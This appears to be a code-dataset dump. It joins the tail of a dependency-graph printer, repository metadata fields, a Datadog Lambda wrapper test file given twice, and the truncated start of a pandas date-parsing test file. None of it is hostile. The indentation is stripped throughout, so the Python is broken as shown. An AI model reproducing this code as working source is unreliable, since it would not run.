def _dep_id(self, dependency):
params = dict(sep=self.separator)
if isinstance(dependency, JarDependency):
params.update(org=dependency.org, name=dependency.name, rev=dependency.rev)
else:
params.update(org='internal', name=dependency.id)
if params.get('rev'):
return "%(org)s%(sep)s%(name)s%(sep)s%(rev)s" % params, False
else:
return "%(org)s%(sep)s%(name)s" % params, True
def _output_dependency_tree(self, target):
def output_dep(dep, indent):
return "%s%s" % (indent * " ", dep)
def output_deps(dep, indent=0, outputted=set()):
dep_id, _ = self._dep_id(dep)
if dep_id in outputted:
return [output_dep("*%s" % dep_id, indent)] if not self.is_minimal else []
else:
output = []
if not self.is_external_only:
output += [output_dep(dep_id, indent)]
outputted.add(dep_id)
indent += 1
if self._is_jvm(dep):
for internal_dep in dep.internal_dependencies:
output += output_deps(internal_dep, indent, outputted)
if not self.is_internal_only:
if self._is_jvm(dep):
for jar_dep in dep.jar_dependencies:
jar_dep_id, internal = self._dep_id(jar_dep)
if not internal:
if jar_dep_id not in outputted or (not self.is_minimal
and not self.is_external_only):
output += [output_dep(jar_dep_id, indent)]
outputted.add(jar_dep_id)
return output
return [dependency for t in target.resolve() for dependency in output_deps(t)]
def _output_digraph(self, target):
def output_candidate(internal):
return ((self.is_internal_only and internal)
or (self.is_external_only and not internal)
or (not self.is_internal_only and not self.is_external_only))
def output_dep(dep):
dep_id, internal = self._dep_id(dep)
science_styled = internal and not self.is_internal_only
twitter_styled = not internal and dep.org.startswith('com.twitter')
if science_styled:
fmt = ' "%(id)s" [label="%(id)s", style="filled", fillcolor="#0084b4", fontcolor="white"];'
return fmt % {'id': dep_id}
elif twitter_styled:
return ' "%s" [style="filled", fillcolor="#c0deed"];' % dep_id
else:
return ' "%s";' % dep_id
def output_deps(outputted, dep):
output = []
if dep not in outputted:
outputted.add(dep)
for dependency in dep.resolve():
if self._is_jvm(dependency):
for internal_dependency in dependency.internal_dependencies:
output += output_deps(outputted, internal_dependency)
for jar in (dependency.jar_dependencies if self._is_jvm(dependency) else [dependency]):
jar_id, internal = self._dep_id(jar)
if output_candidate(internal):
if jar not in outputted:
output += [output_dep(jar)]
outputted.add(jar)
target_id, _ = self._dep_id(target)
dep_id, _ = self._dep_id(dependency)
left_id = target_id if self.is_external_only else dep_id
if (left_id, jar_id) not in outputted:
styled = internal and not self.is_internal_only
output += [' "%s" -> "%s"%s;' % (left_id, jar_id,
' [style="dashed"]' if styled else '')]
outputted.add((left_id, jar_id))
return output
return ['digraph "%s" {' % target.id, output_dep(target)] + output_deps(set(), target) + ['}']
| true
| true
|
f7190276ce7083fff4e92fe7957e9808976cfa88
| 15,748
|
py
|
Python
|
tests/test_wrapper.py
|
Neki/datadog-lambda-python
|
57cc2404b7d2d8ee5ff7791f41f0036aabd13d0c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_wrapper.py
|
Neki/datadog-lambda-python
|
57cc2404b7d2d8ee5ff7791f41f0036aabd13d0c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_wrapper.py
|
Neki/datadog-lambda-python
|
57cc2404b7d2d8ee5ff7791f41f0036aabd13d0c
|
[
"Apache-2.0"
] | null | null | null |
import os
import unittest
try:
from unittest.mock import patch, call, ANY, MagicMock
except ImportError:
from mock import patch, call, ANY, MagicMock
from datadog_lambda.wrapper import datadog_lambda_wrapper
from datadog_lambda.metric import lambda_metric
from datadog_lambda.thread_stats_writer import ThreadStatsWriter
def get_mock_context(
aws_request_id="request-id-1",
memory_limit_in_mb="256",
invoked_function_arn="arn:aws:lambda:us-west-1:123457598159:function:python-layer-test:1",
function_version="1",
client_context={},
):
lambda_context = MagicMock()
lambda_context.aws_request_id = aws_request_id
lambda_context.memory_limit_in_mb = memory_limit_in_mb
lambda_context.invoked_function_arn = invoked_function_arn
lambda_context.function_version = function_version
lambda_context.client_context = client_context
return lambda_context
class TestDatadogLambdaWrapper(unittest.TestCase):
def setUp(self):
# Force @datadog_lambda_wrapper to always create a real
# (not no-op) wrapper.
datadog_lambda_wrapper._force_wrap = True
patcher = patch(
"datadog.threadstats.reporters.HttpReporter.flush_distributions"
)
self.mock_threadstats_flush_distributions = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.extract_dd_trace_context")
self.mock_extract_dd_trace_context = patcher.start()
self.mock_extract_dd_trace_context.return_value = ({}, None)
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.set_correlation_ids")
self.mock_set_correlation_ids = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.inject_correlation_ids")
self.mock_inject_correlation_ids = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.patch_all")
self.mock_patch_all = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.cold_start.is_cold_start")
self.mock_is_cold_start = patcher.start()
self.mock_is_cold_start.return_value = True
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.tags.python_version_tuple")
self.mock_python_version_tuple = patcher.start()
self.mock_python_version_tuple.return_value = ("2", "7", "10")
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.metric.write_metric_point_to_stdout")
self.mock_write_metric_point_to_stdout = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.tags.get_library_version_tag")
self.mock_format_dd_lambda_layer_tag = patcher.start()
# Mock the layer version so we don't have to update tests on every version bump
self.mock_format_dd_lambda_layer_tag.return_value = "datadog_lambda:v6.6.6"
patcher = patch("datadog_lambda.tags._format_dd_lambda_layer_tag")
self.mock_format_dd_lambda_layer_tag = patcher.start()
# Mock the layer version so we don't have to update tests on every version bump
self.mock_format_dd_lambda_layer_tag.return_value = (
"dd_lambda_layer:datadog-python27_0.1.0"
)
self.addCleanup(patcher.stop)
def test_datadog_lambda_wrapper(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_context = get_mock_context()
lambda_handler(lambda_event, lambda_context)
self.mock_threadstats_flush_distributions.assert_has_calls(
[
call(
[
{
"metric": "test.metric",
"points": [[ANY, [100]]],
"type": "distribution",
"host": None,
"device": None,
"tags": ANY,
"interval": 10,
}
]
)
]
)
self.mock_extract_dd_trace_context.assert_called_with(
lambda_event, lambda_context, extractor=None
)
self.mock_set_correlation_ids.assert_called()
self.mock_inject_correlation_ids.assert_called()
self.mock_patch_all.assert_called()
def test_datadog_lambda_wrapper_flush_to_log(self):
os.environ["DD_FLUSH_TO_LOG"] = "True"
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_threadstats_flush_distributions.assert_not_called()
del os.environ["DD_FLUSH_TO_LOG"]
def test_datadog_lambda_wrapper_flush_in_thread(self):
# force ThreadStats to flush in thread
import datadog_lambda.metric as metric_module
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(True)
@datadog_lambda_wrapper
def lambda_handler(event, context):
import time
lambda_metric("test.metric", 100)
time.sleep(11)
# assert flushing in the thread
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 1)
lambda_metric("test.metric", 200)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
# assert another flushing in the end
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 2)
# reset ThreadStats
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(False)
def test_datadog_lambda_wrapper_not_flush_in_thread(self):
# force ThreadStats to not flush in thread
import datadog_lambda.metric as metric_module
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(False)
@datadog_lambda_wrapper
def lambda_handler(event, context):
import time
lambda_metric("test.metric", 100)
time.sleep(11)
# assert no flushing in the thread
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 0)
lambda_metric("test.metric", 200)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
# assert flushing in the end
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 1)
# reset ThreadStats
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(False)
def test_datadog_lambda_wrapper_inject_correlation_ids(self):
os.environ["DD_LOGS_INJECTION"] = "True"
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_set_correlation_ids.assert_called()
self.mock_inject_correlation_ids.assert_called()
del os.environ["DD_LOGS_INJECTION"]
def test_invocations_metric(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
)
]
)
def test_errors_metric(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
raise RuntimeError()
lambda_event = {}
with self.assertRaises(RuntimeError):
lambda_handler(lambda_event, get_mock_context())
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
call(
"aws.lambda.enhanced.errors",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
]
)
def test_enhanced_metrics_cold_start_tag(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_is_cold_start.return_value = False
lambda_handler(
lambda_event, get_mock_context(aws_request_id="second-request-id")
)
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:false",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
]
)
def test_enhanced_metrics_latest(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_context = get_mock_context()
lambda_context.invoked_function_arn = (
"arn:aws:lambda:us-west-1:123457598159:function:python-layer-test:$Latest"
)
lambda_handler(lambda_event, lambda_context)
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:Latest",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
)
]
)
def test_enhanced_metrics_alias(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_context = get_mock_context()
# tests wouldn't run because line was too long
alias_arn = "arn:aws:lambda:us-west-1:123457598159:function:python-layer-test:My_alias-1"
lambda_context.invoked_function_arn = alias_arn
lambda_handler(lambda_event, lambda_context)
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"executedversion:1",
"resource:python-layer-test:My_alias-1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
)
]
)
def test_no_enhanced_metrics_without_env_var(self):
os.environ["DD_ENHANCED_METRICS"] = "false"
@datadog_lambda_wrapper
def lambda_handler(event, context):
raise RuntimeError()
lambda_event = {}
with self.assertRaises(RuntimeError):
lambda_handler(lambda_event, get_mock_context())
self.mock_write_metric_point_to_stdout.assert_not_called()
del os.environ["DD_ENHANCED_METRICS"]
def test_only_one_wrapper_in_use(self):
patcher = patch("datadog_lambda.wrapper.submit_invocations_metric")
self.mock_submit_invocations_metric = patcher.start()
self.addCleanup(patcher.stop)
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
# Turn off _force_wrap to emulate the nested wrapper scenario,
# the second @datadog_lambda_wrapper should actually be no-op.
datadog_lambda_wrapper._force_wrap = False
lambda_handler_double_wrapped = datadog_lambda_wrapper(lambda_handler)
lambda_event = {}
lambda_handler_double_wrapped(lambda_event, get_mock_context())
self.mock_patch_all.assert_called_once()
self.mock_submit_invocations_metric.assert_called_once()
| 35.954338
| 97
| 0.573025
|
import os
import unittest
try:
from unittest.mock import patch, call, ANY, MagicMock
except ImportError:
from mock import patch, call, ANY, MagicMock
from datadog_lambda.wrapper import datadog_lambda_wrapper
from datadog_lambda.metric import lambda_metric
from datadog_lambda.thread_stats_writer import ThreadStatsWriter
def get_mock_context(
aws_request_id="request-id-1",
memory_limit_in_mb="256",
invoked_function_arn="arn:aws:lambda:us-west-1:123457598159:function:python-layer-test:1",
function_version="1",
client_context={},
):
lambda_context = MagicMock()
lambda_context.aws_request_id = aws_request_id
lambda_context.memory_limit_in_mb = memory_limit_in_mb
lambda_context.invoked_function_arn = invoked_function_arn
lambda_context.function_version = function_version
lambda_context.client_context = client_context
return lambda_context
class TestDatadogLambdaWrapper(unittest.TestCase):
def setUp(self):
datadog_lambda_wrapper._force_wrap = True
patcher = patch(
"datadog.threadstats.reporters.HttpReporter.flush_distributions"
)
self.mock_threadstats_flush_distributions = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.extract_dd_trace_context")
self.mock_extract_dd_trace_context = patcher.start()
self.mock_extract_dd_trace_context.return_value = ({}, None)
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.set_correlation_ids")
self.mock_set_correlation_ids = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.inject_correlation_ids")
self.mock_inject_correlation_ids = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.patch_all")
self.mock_patch_all = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.cold_start.is_cold_start")
self.mock_is_cold_start = patcher.start()
self.mock_is_cold_start.return_value = True
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.tags.python_version_tuple")
self.mock_python_version_tuple = patcher.start()
self.mock_python_version_tuple.return_value = ("2", "7", "10")
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.metric.write_metric_point_to_stdout")
self.mock_write_metric_point_to_stdout = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.tags.get_library_version_tag")
self.mock_format_dd_lambda_layer_tag = patcher.start()
self.mock_format_dd_lambda_layer_tag.return_value = "datadog_lambda:v6.6.6"
patcher = patch("datadog_lambda.tags._format_dd_lambda_layer_tag")
self.mock_format_dd_lambda_layer_tag = patcher.start()
# Mock the layer version so we don't have to update tests on every version bump
self.mock_format_dd_lambda_layer_tag.return_value = (
"dd_lambda_layer:datadog-python27_0.1.0"
)
self.addCleanup(patcher.stop)
def test_datadog_lambda_wrapper(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_context = get_mock_context()
lambda_handler(lambda_event, lambda_context)
self.mock_threadstats_flush_distributions.assert_has_calls(
[
call(
[
{
"metric": "test.metric",
"points": [[ANY, [100]]],
"type": "distribution",
"host": None,
"device": None,
"tags": ANY,
"interval": 10,
}
]
)
]
)
self.mock_extract_dd_trace_context.assert_called_with(
lambda_event, lambda_context, extractor=None
)
self.mock_set_correlation_ids.assert_called()
self.mock_inject_correlation_ids.assert_called()
self.mock_patch_all.assert_called()
def test_datadog_lambda_wrapper_flush_to_log(self):
os.environ["DD_FLUSH_TO_LOG"] = "True"
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_threadstats_flush_distributions.assert_not_called()
del os.environ["DD_FLUSH_TO_LOG"]
def test_datadog_lambda_wrapper_flush_in_thread(self):
import datadog_lambda.metric as metric_module
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(True)
@datadog_lambda_wrapper
def lambda_handler(event, context):
import time
lambda_metric("test.metric", 100)
time.sleep(11)
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 1)
lambda_metric("test.metric", 200)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 2)
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(False)
def test_datadog_lambda_wrapper_not_flush_in_thread(self):
import datadog_lambda.metric as metric_module
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(False)
@datadog_lambda_wrapper
def lambda_handler(event, context):
import time
lambda_metric("test.metric", 100)
time.sleep(11)
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 0)
lambda_metric("test.metric", 200)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 1)
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(False)
def test_datadog_lambda_wrapper_inject_correlation_ids(self):
os.environ["DD_LOGS_INJECTION"] = "True"
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_set_correlation_ids.assert_called()
self.mock_inject_correlation_ids.assert_called()
del os.environ["DD_LOGS_INJECTION"]
def test_invocations_metric(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
)
]
)
def test_errors_metric(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
raise RuntimeError()
lambda_event = {}
with self.assertRaises(RuntimeError):
lambda_handler(lambda_event, get_mock_context())
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
call(
"aws.lambda.enhanced.errors",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
]
)
def test_enhanced_metrics_cold_start_tag(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_is_cold_start.return_value = False
lambda_handler(
lambda_event, get_mock_context(aws_request_id="second-request-id")
)
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:false",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
]
)
def test_enhanced_metrics_latest(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_context = get_mock_context()
lambda_context.invoked_function_arn = (
"arn:aws:lambda:us-west-1:123457598159:function:python-layer-test:$Latest"
)
lambda_handler(lambda_event, lambda_context)
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:Latest",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
)
]
)
def test_enhanced_metrics_alias(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_context = get_mock_context()
alias_arn = "arn:aws:lambda:us-west-1:123457598159:function:python-layer-test:My_alias-1"
lambda_context.invoked_function_arn = alias_arn
lambda_handler(lambda_event, lambda_context)
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"executedversion:1",
"resource:python-layer-test:My_alias-1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
)
]
)
def test_no_enhanced_metrics_without_env_var(self):
os.environ["DD_ENHANCED_METRICS"] = "false"
@datadog_lambda_wrapper
def lambda_handler(event, context):
raise RuntimeError()
lambda_event = {}
with self.assertRaises(RuntimeError):
lambda_handler(lambda_event, get_mock_context())
self.mock_write_metric_point_to_stdout.assert_not_called()
del os.environ["DD_ENHANCED_METRICS"]
def test_only_one_wrapper_in_use(self):
patcher = patch("datadog_lambda.wrapper.submit_invocations_metric")
self.mock_submit_invocations_metric = patcher.start()
self.addCleanup(patcher.stop)
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
# Turn off _force_wrap to emulate the nested wrapper scenario,
# the second @datadog_lambda_wrapper should actually be no-op.
datadog_lambda_wrapper._force_wrap = False
lambda_handler_double_wrapped = datadog_lambda_wrapper(lambda_handler)
lambda_event = {}
lambda_handler_double_wrapped(lambda_event, get_mock_context())
self.mock_patch_all.assert_called_once()
self.mock_submit_invocations_metric.assert_called_once()
| true
| true
|
f719035a10609454242fe84d548ee0290b6fb04e
| 34,201
|
py
|
Python
|
pandas/tests/io/parser/test_parse_dates.py
|
sayanmondal2098/pandas
|
2f6b90aaaab6814c102eb160c5a9c11bc04a092e
|
[
"BSD-3-Clause"
] | 1
|
2019-05-19T13:44:03.000Z
|
2019-05-19T13:44:03.000Z
|
pandas/tests/io/parser/test_parse_dates.py
|
sanjusci/pandas
|
a1fee9199eba7ebf423880243936b9f1501d3d3a
|
[
"BSD-3-Clause"
] | null | null | null |
pandas/tests/io/parser/test_parse_dates.py
|
sanjusci/pandas
|
a1fee9199eba7ebf423880243936b9f1501d3d3a
|
[
"BSD-3-Clause"
] | 3
|
2018-01-08T08:40:55.000Z
|
2019-10-07T02:02:40.000Z
|
# -*- coding: utf-8 -*-
"""
Tests date parsing functionality for all of the
parsers defined in parsers.py
"""
from datetime import date, datetime
from io import StringIO
import numpy as np
import pytest
import pytz
from pandas._libs.tslib import Timestamp
from pandas._libs.tslibs import parsing
from pandas.compat import lrange, parse_date
from pandas.compat.numpy import np_array_datetime64_compat
import pandas as pd
from pandas import DataFrame, DatetimeIndex, Index, MultiIndex
from pandas.core.indexes.datetimes import date_range
import pandas.util.testing as tm
import pandas.io.date_converters as conv
import pandas.io.parsers as parsers
def test_separator_date_conflict(all_parsers):
# Regression test for gh-4678
#
# Make sure thousands separator and
# date parsing do not conflict.
parser = all_parsers
data = "06-02-2013;13:00;1-000.215"
expected = DataFrame([[datetime(2013, 6, 2, 13, 0, 0), 1000.215]],
columns=["Date", 2])
df = parser.read_csv(StringIO(data), sep=";", thousands="-",
parse_dates={"Date": [0, 1]}, header=None)
tm.assert_frame_equal(df, expected)
@pytest.mark.parametrize("keep_date_col", [True, False])
def test_multiple_date_col_custom(all_parsers, keep_date_col):
data = """\
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
parser = all_parsers
def date_parser(*date_cols):
"""
Test date parser.
Parameters
----------
date_cols : args
The list of data columns to parse.
Returns
-------
parsed : Series
"""
return parsing.try_parse_dates(parsers._concat_date_cols(date_cols))
result = parser.read_csv(StringIO(data), header=None,
date_parser=date_parser, prefix="X",
parse_dates={"actual": [1, 2],
"nominal": [1, 3]},
keep_date_col=keep_date_col)
expected = DataFrame([
[datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
"KORD", "19990127", " 19:00:00", " 18:56:00",
0.81, 2.81, 7.2, 0.0, 280.0],
[datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
"KORD", "19990127", " 20:00:00", " 19:56:00",
0.01, 2.21, 7.2, 0.0, 260.0],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
"KORD", "19990127", " 21:00:00", " 20:56:00",
-0.59, 2.21, 5.7, 0.0, 280.0],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
"KORD", "19990127", " 21:00:00", " 21:18:00",
-0.99, 2.01, 3.6, 0.0, 270.0],
[datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
"KORD", "19990127", " 22:00:00", " 21:56:00",
-0.59, 1.71, 5.1, 0.0, 290.0],
[datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
"KORD", "19990127", " 23:00:00", " 22:56:00",
-0.59, 1.71, 4.6, 0.0, 280.0],
], columns=["actual", "nominal", "X0", "X1", "X2",
"X3", "X4", "X5", "X6", "X7", "X8"])
if not keep_date_col:
expected = expected.drop(["X1", "X2", "X3"], axis=1)
elif parser.engine == "python":
expected["X1"] = expected["X1"].astype(np.int64)
# Python can sometimes be flaky about how
# the aggregated columns are entered, so
# this standardizes the order.
result = result[expected.columns]
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("keep_date_col", [True, False])
def test_multiple_date_col(all_parsers, keep_date_col):
data = """\
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), header=None,
prefix="X", parse_dates=[[1, 2], [1, 3]],
keep_date_col=keep_date_col)
expected = DataFrame([
[datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
"KORD", "19990127", " 19:00:00", " 18:56:00",
0.81, 2.81, 7.2, 0.0, 280.0],
[datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
"KORD", "19990127", " 20:00:00", " 19:56:00",
0.01, 2.21, 7.2, 0.0, 260.0],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
"KORD", "19990127", " 21:00:00", " 20:56:00",
-0.59, 2.21, 5.7, 0.0, 280.0],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
"KORD", "19990127", " 21:00:00", " 21:18:00",
-0.99, 2.01, 3.6, 0.0, 270.0],
[datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
"KORD", "19990127", " 22:00:00", " 21:56:00",
-0.59, 1.71, 5.1, 0.0, 290.0],
[datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
"KORD", "19990127", " 23:00:00", " 22:56:00",
-0.59, 1.71, 4.6, 0.0, 280.0],
], columns=["X1_X2", "X1_X3", "X0", "X1", "X2",
